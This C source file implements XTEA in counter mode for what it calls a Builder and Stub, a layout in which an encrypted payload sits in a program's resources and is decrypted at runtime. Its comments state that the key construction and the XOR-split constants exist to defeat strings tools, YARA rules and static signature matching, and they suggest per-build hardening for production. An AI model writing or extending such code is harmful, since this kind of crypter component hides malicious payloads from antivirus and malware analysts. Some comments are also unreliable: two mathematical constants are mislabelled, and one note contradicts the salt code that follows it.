/*
 * ==========================================================================
 *  Xtea.c — XTEA Block Cipher in CTR Mode — implementation
 * ==========================================================================
 *
 *  For algorithm description and design rationale see Xtea.h.
 *  This file is shared between Builder and Stub — no CRT dependency,
 *  only Windows.h types (DWORD, PBYTE, SIZE_T).
 * ==========================================================================
 */

#include "Xtea.h"

/* XTEA_DELTA (0x9E3779B9 = floor((phi-1)*2^32)) — computed at runtime via
 * volatile XOR split so the literal never appears in the binary as-is.
 * 0xDEADBEEF ^ 0x409AC756 == 0x9E3779B9 */
#define XTEA_ROUNDS 32

static DWORD ComputeXteaDelta(void) {
    volatile DWORD a = 0xDEADBEEFu;
    volatile DWORD b = 0x409AC756u;
    return a ^ b;
}

/* ============================================================
 *  Xtea_EncryptBlock (internal — not exposed in header)
 *
 *  Encrypts a single 64-bit block in-place.
 *  delta — XTEA round constant, computed once by the caller.
 * ============================================================ */
static void Xtea_EncryptBlock(DWORD v[2], const DWORD key[4], DWORD delta)
{
    DWORD v0  = v[0];
    DWORD v1  = v[1];
    DWORD sum = 0;

    for (int i = 0; i < XTEA_ROUNDS; i++) {
        v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
        sum += delta;
        v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
    }

    v[0] = v0;
    v[1] = v1;
}

/* ============================================================
 *  Xtea_DeriveKey
 *
 *  Stack Construction Key Derivation
 *  ==================================
 *  Goal: eliminate the 16-byte key blob from .data so that:
 *    - hex dump / strings tools find no contiguous key pattern
 *    - YARA rules cannot match a fixed byte sequence
 *    - a decompiler must trace a chain of arithmetic to reconstruct the key
 *
 *  How stack construction works:
 *    Instead of:
 *        DWORD key[4] = { 0xAABBCCDD, 0x11223344, 0xEEFF0011, 0x55667788 };
 *    which produces a contiguous 16-byte blob in the binary, we build
 *    each key word through a sequence of MOV / XOR / SHL / ROR / ADD
 *    instructions operating on stack-allocated locals. The compiled code
 *    has no flat key blob — only a stream of arithmetic that produces
 *    key words individually in registers.
 *
 *  Constants used — "nothing-up-my-sleeve" numbers:
 *    Each seed constant is a well-known mathematical value scaled to 32 bits.
 *    Using irrational numbers eliminates suspicion of hidden backdoors
 *    (same technique used in the round constants of SHA-1 and SHA-2).
 *
 *    0x9E3779B9 = floor((phi - 1)    * 2^32)    phi   = (1+sqrt(5))/2
 *    0x5A827999 = floor( sqrt(2)/2   * 2^32)    sqrt(2) ≈ 1.41421...
 *    0x6ED9EBA1 = floor( sqrt(3)/2   * 2^32)    sqrt(3) ≈ 1.73205...
 *    0x8F1BBCDC = floor( sqrt(5)/4   * 2^32)    sqrt(5) ≈ 2.23607...
 *    0xCA62C1D6 = floor( sqrt(10)/4  * 2^32)    sqrt(10)≈ 3.16228...
 *
 *  Limitation (PoC):
 *    The derived key is IDENTICAL in every build — it depends only on
 *    fixed constants. For production, XOR each key word with a per-build
 *    random DWORD generated by Builder and stored in .rsrc alongside the
 *    payload (also obfuscated). The Stub reads the random DWORDs and XORs
 *    them into the derived base key before calling Xtea_Crypt().
 * ============================================================ */
void Xtea_DeriveKey(DWORD key[4], const DWORD salt[4])
{
    /* All 5 seed constants are split via volatile XOR pairs — none appear as
     * 4-byte literals in the binary, preventing static constant matching.
     * Pre-image pairs (A ^ B):
     *   0x9E3779B9 = 0xDEADBEEF ^ 0x409AC756  (phi,   golden ratio)
     *   0x5A827999 = 0xDEADBEEF ^ 0x842FC776  (sqrt2 / 2)
     *   0x6ED9EBA1 = 0xDEADBEEF ^ 0xB074554E  (sqrt3 / 2)
     *   0x8F1BBCDC = 0xDEADBEEF ^ 0x51B60233  (sqrt5 / 4)
     *   0xCA62C1D6 = 0xDEADBEEF ^ 0x14CF7F39  (sqrt10 / 4)         */
    volatile DWORD _mask = 0xDEADBEEFu;

    /* ---- k0: golden-ratio base ---- */
    DWORD k0 = _mask ^ 0x409AC756u;         /* 0x9E3779B9                   */
    k0 ^= (k0 >> 11) | (k0 << 21);
    k0 += _mask ^ 0x842FC776u;              /* + 0x5A827999 (sqrt2/2)       */

    /* ---- k1: sqrt(3)-mixed ---- */
    DWORD k1 = (k0 >> 7) | (k0 << 25);
    k1 ^= _mask ^ 0xB074554Eu;             /* XOR 0x6ED9EBA1 (sqrt3/2)     */
    k1 += k0;

    /* ---- k2: sqrt(5)-mixed ---- */
    DWORD k2 = k0 ^ k1;
    k2 ^= (k1 << 17) | (k1 >> 15);
    k2 += _mask ^ 0x51B60233u;             /* + 0x8F1BBCDC (sqrt5/4)       */

    /* ---- k3: sqrt(10)-mixed ---- */
    DWORD k3 = k0 ^ k1 ^ k2;
    k3 += (k2 >> 11) | (k2 << 21);
    k3 ^= _mask ^ 0x14CF7F39u;             /* XOR 0xCA62C1D6 (sqrt10/4)    */

    /* XOR each key word with the per-build salt supplied by the caller.
     * Builder generates salt via CryptGenRandom and stores it plaintext
     * in the .rsrc metadata block. Stub reads it before calling here.
     * Result: every build has a unique XTEA key even though the
     * stack-construction formula above is identical in both binaries. */
    key[0] = k0 ^ salt[0];
    key[1] = k1 ^ salt[1];
    key[2] = k2 ^ salt[2];
    key[3] = k3 ^ salt[3];
}

/* ============================================================
 *  Xtea_Crypt
 *
 *  XTEA in CTR (Counter) Mode — encrypt or decrypt in-place.
 *
 *  CTR mode operation:
 *    - A 64-bit counter (lo, hi) is initialized to zero.
 *    - For each 8-byte chunk of data:
 *        1. Encrypt the counter as a 64-bit XTEA block → 8 keystream bytes.
 *        2. XOR up to 8 plaintext/ciphertext bytes with those keystream bytes.
 *        3. Increment the counter (lo; carry into hi if lo overflows).
 *    - For the final incomplete chunk, only the needed keystream bytes are used.
 *
 *  Symmetry: XOR is self-inverse, so calling Xtea_Crypt on ciphertext
 *  with the same key and a fresh counter (starting at 0) recovers plaintext.
 *  Builder and Stub both call Xtea_Crypt once — Builder to encrypt,
 *  Stub to decrypt — with the same key from Xtea_DeriveKey().
 *
 *  Note on IV/nonce:
 *    Starting the counter at 0 is safe here because each payload uses a
 *    freshly-generated per-build CompoundKey (inner cipher), so the effective
 *    plaintext differs between builds even with a fixed outer XTEA key.
 *    A production system would embed a random 8-byte IV in the .rsrc header
 *    to initialize the counter, preventing multi-build key-reuse analysis.
 * ============================================================ */
void Xtea_Crypt(PBYTE pData, SIZE_T dataLen, const DWORD key[4])
{
    /* 64-bit counter represented as two 32-bit halves (avoids uint64_t) */
    DWORD ctr_lo = 0;  /* low  32 bits */
    DWORD ctr_hi = 0;  /* high 32 bits */

    DWORD delta = ComputeXteaDelta();  /* compute once; reused for every block */

    SIZE_T i = 0;
    while (i < dataLen) {

        /* Step 1: copy current counter into a temporary block and encrypt it.
         * The encrypted block is our keystream for the next 8 bytes of data. */
        DWORD block[2] = { ctr_lo, ctr_hi };
        Xtea_EncryptBlock(block, key, delta);

        /* Step 2: XOR up to 8 data bytes with the keystream.
         * Casting block to PBYTE lets us access the keystream byte-by-byte,
         * which handles the final partial block without extra code. */
        PBYTE ks = (PBYTE)block;
        for (int j = 0; j < 8 && i < dataLen; j++, i++) {
            pData[i] ^= ks[j];
        }

        /* Step 3: increment the 64-bit counter.
         * Adding 1 to ctr_lo and propagating carry into ctr_hi if it wraps.
         * This counter can safely process 2^64 * 8 = 2^67 bytes before repeating
         * — far beyond any realistic payload size. */
        ctr_lo++;
        if (ctr_lo == 0) ctr_hi++;  /* carry: ctr_lo wrapped around to 0 */
    }
}
